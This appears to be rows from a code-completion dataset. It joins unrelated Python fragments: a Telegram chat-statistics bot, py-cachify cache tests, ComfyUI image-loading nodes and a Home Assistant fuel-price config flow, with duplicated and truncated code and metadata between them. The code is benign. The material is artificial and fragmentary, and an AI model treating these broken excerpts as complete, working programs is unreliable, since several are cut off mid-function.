order\n user_stats = df.sort_values(by=\"attachment_count\", ascending=False)\n\n # Select the top 10 users\n top_10_users = user_stats.head(10)\n\n # Plot the bar chart\n plt.bar(top_10_users[\"user_id\"], top_10_users[\"attachment_count\"])\n plt.xlabel(\"User ID\")\n plt.ylabel(\"Attachment Count\")\n plt.title(f\"Top 10 Users by Attachment Count in {update.effective_chat.title}\")\n plt.legend()\n buf = io.BytesIO()\n plt.savefig(buf, format=\"png\")\n buf.seek(0)\n await msg.delete()\n await context.bot.send_photo(\n chat_id=update.effective_chat.id,\n photo=buf,\n reply_to_message_id=msg.reply_to_message.message_id,\n )"
},
{
"identifier": "plot_table",
"path": "stats_bot/handlers/plot.py",
"snippet": "@admin\nasync def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Generates a table of top 10 users by number of messages and average message length,\n and plots a bar chart to visualize the data.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.\n\n Returns:\n None\n \"\"\"\n msg = await update.effective_message.reply_text(\"Generating table...\")\n data = []\n\n # fetch this data from database\n with Session(engine) as session:\n # users = session.exec(select(User)).all()\n messages = session.exec(\n select(Message).where(Message.group_id == update.effective_chat.id)\n ).all()\n # make a list of users, messages of whom are in the messages variable\n users = []\n for message in messages:\n if message.user_id not in users:\n users.append(message.user_id)\n # print(users)\n for user in users:\n usr = session.exec(select(User).where(User.id == user)).first()\n msgs = session.exec(\n select(Message.text).where(Message.user_id == usr.id)\n ).all()\n data.append((usr.username or str(usr.id), msgs))\n # Convert data to a pandas DataFrame\n df = pd.DataFrame(data, columns=[\"user_id\", \"messages\"])\n\n print(df)\n\n df[\"num_messages\"] = df[\"messages\"].apply(len)\n\n # Calculate average message length per user\n df[\"avg_message_length\"] = df[\"messages\"].apply(\n lambda x: sum(len(message) for message in x) / len(x)\n )\n\n # Sort users by number of messages and average message length\n df = df.sort_values(by=[\"num_messages\", \"avg_message_length\"], ascending=False)\n\n # Plot top 10 users\n top_10_users = df.head(10)\n plt.figure(figsize=(10, 6))\n plt.bar(\n top_10_users[\"user_id\"],\n top_10_users[\"num_messages\"],\n color=\"blue\",\n alpha=0.6,\n label=\"Number of Messages\",\n )\n plt.xlabel(\"User ID\")\n plt.ylabel(\"Number of Messages\")\n plt.title(\n f\"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length\"\n )\n plt.legend()\n buf = io.BytesIO()\n plt.savefig(buf, format=\"png\")\n buf.seek(0)\n await msg.delete()\n await context.bot.send_photo(\n chat_id=update.effective_chat.id,\n photo=buf,\n reply_to_message_id=msg.reply_to_message.message_id,\n )"
}
] | from telegram.ext import (
ApplicationBuilder,
CommandHandler,
MessageHandler,
filters,
)
from stats_bot.handlers.start import start
from stats_bot.handlers.group import handle_update
from stats_bot.handlers.plot import attachment_stats, plot_table
import logging, configparser
import stats_bot.db.client as client | 1,855 |
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE))
|
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE)) | app.add_handler(CommandHandler("attachmentstats", attachment_stats, filters=filters.ChatType.GROUPS)) | 2 | 2023-12-18 03:05:36+00:00 | 4k |
EzyGang/py-cachify | tests/test_backend.py | [
{
"identifier": "AsyncWrapper",
"path": "py_cachify/backend/clients.py",
"snippet": "class AsyncWrapper:\n def __init__(self, cache: MemoryCache) -> None:\n self._cache = cache\n\n async def get(self, name: str, default: Any = None) -> Any:\n return self._cache.get(name=name, default=default)\n\n async def delete(self, *names: str) -> Any:\n self._cache.delete(*names)\n\n async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any:\n self._cache.set(name=name, value=value, ex=ex)"
},
{
"identifier": "MemoryCache",
"path": "py_cachify/backend/clients.py",
"snippet": "class MemoryCache:\n def __init__(self) -> None:\n self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {}\n\n def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None:\n self._cache[name] = value, ex and time.time() + ex\n\n def get(self, name: str, default: Any = None) -> Any:\n val, exp_at = self._cache.get(name, (default, None))\n\n if not exp_at or exp_at > time.time():\n return val\n\n self.delete(name)\n return default\n\n def delete(self, *names: str) -> None:\n for key in names:\n if key not in self._cache:\n continue\n\n del self._cache[key]"
},
{
"identifier": "CachifyInitError",
"path": "py_cachify/backend/exceptions.py",
"snippet": "class CachifyInitError(Exception):\n pass"
},
{
"identifier": "Cachify",
"path": "py_cachify/backend/lib.py",
"snippet": "class Cachify:\n def __init__(\n self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str\n ) -> None:\n self._sync_client = sync_client\n self._async_client = async_client\n self._prefix = prefix\n\n def set(self, key: str, val: Any, ttl: Union[int, None] = None) -> Any:\n self._sync_client.set(name=f'{self._prefix}{key}', value=pickle.dumps(val), ex=ttl)\n\n def get(self, key: str) -> Any:\n return (val := self._sync_client.get(name=f'{self._prefix}{key}')) and pickle.loads(val)\n\n def delete(self, key: str) -> Any:\n return self._sync_client.delete(f'{self._prefix}{key}')\n\n async def a_get(self, key: str) -> Any:\n return (val := await self._async_client.get(name=f'{self._prefix}{key}')) and pickle.loads(val)\n\n async def a_set(self, key: str, val: Any, ttl: Union[int, None] = None) -> Any:\n await self._async_client.set(name=f'{self._prefix}{key}', value=pickle.dumps(val), ex=ttl)\n\n async def a_delete(self, key: str) -> Any:\n return await self._async_client.delete(f'{self._prefix}{key}')"
},
{
"identifier": "get_cachify",
"path": "py_cachify/backend/lib.py",
"snippet": "def get_cachify() -> Cachify:\n global _cachify\n if _cachify is None:\n raise CachifyInitError('Cachify is not initialized, did you forget to call `init_cachify`?')\n\n return _cachify"
}
] | import time
import pytest
import py_cachify.backend.lib
from pytest_mock import MockerFixture
from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.lib import Cachify, get_cachify | 1,777 | @pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
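    # Cachify prepends this prefix to every key it stores, so cached entries are namespaced under '_PYC_'.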
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'):
|
@pytest.fixture
def memory_cache():
return MemoryCache()
@pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
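    # Cachify prepends this prefix to every key it stores, so cached entries are namespaced under '_PYC_'.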
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'): | get_cachify() | 4 | 2023-12-16 22:54:51+00:00 | 4k |
lldacing/comfyui-easyapi-nodes | easyapi/ImageNode.py | [
{
"identifier": "tensor_to_pil",
"path": "easyapi/util.py",
"snippet": "def tensor_to_pil(image):\n return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))"
},
{
"identifier": "pil_to_tensor",
"path": "easyapi/util.py",
"snippet": "def pil_to_tensor(image):\n return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0)"
},
{
"identifier": "base64_to_image",
"path": "easyapi/util.py",
"snippet": "def base64_to_image(base64_string):\n # 去除前缀\n base64_list = base64_string.split(\",\", 1)\n if len(base64_list) == 2:\n prefix, base64_data = base64_list\n else:\n base64_data = base64_list[0]\n\n # 从base64字符串中解码图像数据\n image_data = base64.b64decode(base64_data)\n\n # 创建一个内存流对象\n image_stream = io.BytesIO(image_data)\n\n # 使用PIL的Image模块打开图像数据\n image = Image.open(image_stream)\n\n return image"
},
{
"identifier": "image_to_base64",
"path": "easyapi/util.py",
"snippet": "def image_to_base64(pli_image, pnginfo=None):\n # 创建一个BytesIO对象,用于临时存储图像数据\n image_data = io.BytesIO()\n\n # 将图像保存到BytesIO对象中,格式为PNG\n pli_image.save(image_data, format='PNG', pnginfo=pnginfo)\n\n # 将BytesIO对象的内容转换为字节串\n image_data_bytes = image_data.getvalue()\n\n # 将图像数据编码为Base64字符串\n encoded_image = \"data:image/png;base64,\" + base64.b64encode(image_data_bytes).decode('utf-8')\n\n return encoded_image"
},
{
"identifier": "read_image_from_url",
"path": "easyapi/util.py",
"snippet": "def read_image_from_url(image_url):\n response = requests.get(image_url)\n img = Image.open(io.BytesIO(response.content))\n return img"
}
] | import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url
| 1,786 | """
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
                # The following code is adapted from LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
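                # Use the selected colour channel as the mask; the alpha channel is inverted so fully opaque pixels map to 0.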
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
    Convert a base64-encoded image back into an image tensor.
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
            # The following code is adapted from LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
    # As an output node, the returned data format is {"ui": {output_name: value}, "result": (value,)}
    # "ui" is the content sent back to the front end over the websocket; "result" is what the Python execution passes to the next node
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
|
class LoadImageFromURL:
"""
    Load an image from a remote URL.
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
    Load a mask image from a remote URL.
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
                # The following code is adapted from LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
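                # Use the selected colour channel as the mask; the alpha channel is inverted so fully opaque pixels map to 0.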
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
    Convert a base64-encoded image back into an image tensor.
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
            # The following code is adapted from LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
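            # If an alpha channel exists, use it as the mask, inverted so transparent pixels become 1 (matching LoadImage); otherwise fall back to an empty 64x64 mask.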
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
    # As an output node, the returned data format is {"ui": {output_name: value}, "result": (value,)}
    # "ui" is the content sent back to the front end over the websocket; "result" is what the Python execution passes to the next node
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
| img = tensor_to_pil(i)
| 0 | 2023-12-19 02:32:10+00:00 | 4k |
pantherale0/ha-fuelprices | custom_components/fuel_prices/config_flow.py | [
{
"identifier": "DOMAIN",
"path": "custom_components/fuel_prices/const.py",
"snippet": "DOMAIN = \"fuel_prices\""
},
{
"identifier": "NAME",
"path": "custom_components/fuel_prices/const.py",
"snippet": "NAME = \"Fuel Prices\""
},
{
"identifier": "CONF_AREAS",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_AREAS = \"areas\""
},
{
"identifier": "CONF_SOURCES",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_SOURCES = \"sources\""
}
] | import logging
import voluptuous as vol
from typing import Any
from homeassistant.config_entries import ConfigEntry, OptionsFlow
from pyfuelprices.sources.mapping import SOURCE_MAP, COUNTRY_MAP
from homeassistant import config_entries
from homeassistant.data_entry_flow import FlowResult
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import selector
from homeassistant.helpers import config_validation as cv
from homeassistant.core import callback
from homeassistant.const import (
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_NAME,
CONF_TIMEOUT,
CONF_SCAN_INTERVAL,
)
from .const import DOMAIN, NAME, CONF_AREAS, CONF_SOURCES | 2,065 | CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
errors: dict[str, str] = {}
if user_input is not None:
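            # Fall back to country-specific sources, and then to every known source, if none were selected manually.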
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP)
| """Config flow for Fuel Prices."""
_LOGGER = logging.getLogger(__name__)
AREA_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): selector.TextSelector(),
vol.Required(CONF_RADIUS, default=5.0): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.longitude,
}
)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow."""
VERSION = 1
configured_areas: list[dict] = []
configured_sources = []
configuring_area = {}
configuring_index = -1
timeout = None
interval = None
@property
def configured_area_names(self) -> list[str]:
"""Return a list of area names."""
items = []
for area in self.configured_areas:
items.append(area["name"])
return items
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle the intial step."""
# only one config entry allowed
# users should use the options flow to adjust areas and sources.
await self.async_set_unique_id(NAME)
self._abort_if_unique_id_configured()
self.configured_areas = []
self.configured_sources = []
self.configuring_area = {}
self.configuring_index = -1
self.timeout = 10
self.interval = 1440
# add the home location as a default (this can optionally be removed).
self.configured_areas.append(
{
CONF_NAME: self.hass.config.location_name,
CONF_LATITUDE: self.hass.config.latitude,
CONF_LONGITUDE: self.hass.config.longitude,
CONF_RADIUS: 10.0,
}
)
return await self.async_step_main_menu()
async def async_step_main_menu(self, _: None = None):
"""Display configuration menu."""
return self.async_show_menu(
step_id="main_menu",
menu_options={
"area_menu": "Configure areas to create devices/sensors",
"sources": "Configure data collector sources",
"finished": "Complete setup",
},
)
async def async_step_sources(self, user_input: dict[str, Any] | None = None):
"""Set data source config."""
if user_input is not None:
self.configured_sources = user_input[CONF_SOURCES]
return await self.async_step_main_menu(None)
return self.async_show_form(
step_id="sources",
data_schema=vol.Schema(
{
vol.Optional(
CONF_SOURCES, default=self.configured_sources
): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.DROPDOWN,
options=list(SOURCE_MAP),
multiple=True,
)
),
vol.Optional(
CONF_TIMEOUT,
default=self.timeout,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=5,
max=60,
unit_of_measurement="s",
)
),
vol.Optional(
CONF_SCAN_INTERVAL,
default=self.interval,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=120,
max=1440,
unit_of_measurement="m",
)
),
}
),
)
async def async_step_area_menu(self, _: None = None) -> FlowResult:
"""Show the area menu."""
return self.async_show_menu(
step_id="area_menu",
menu_options={
"area_create": "Define a new area",
"area_update_select": "Update an area",
"area_delete": "Delete an area",
"main_menu": "Return to main menu",
},
)
async def async_step_area_create(self, user_input: dict[str, Any] | None = None):
"""Handle an area configuration."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
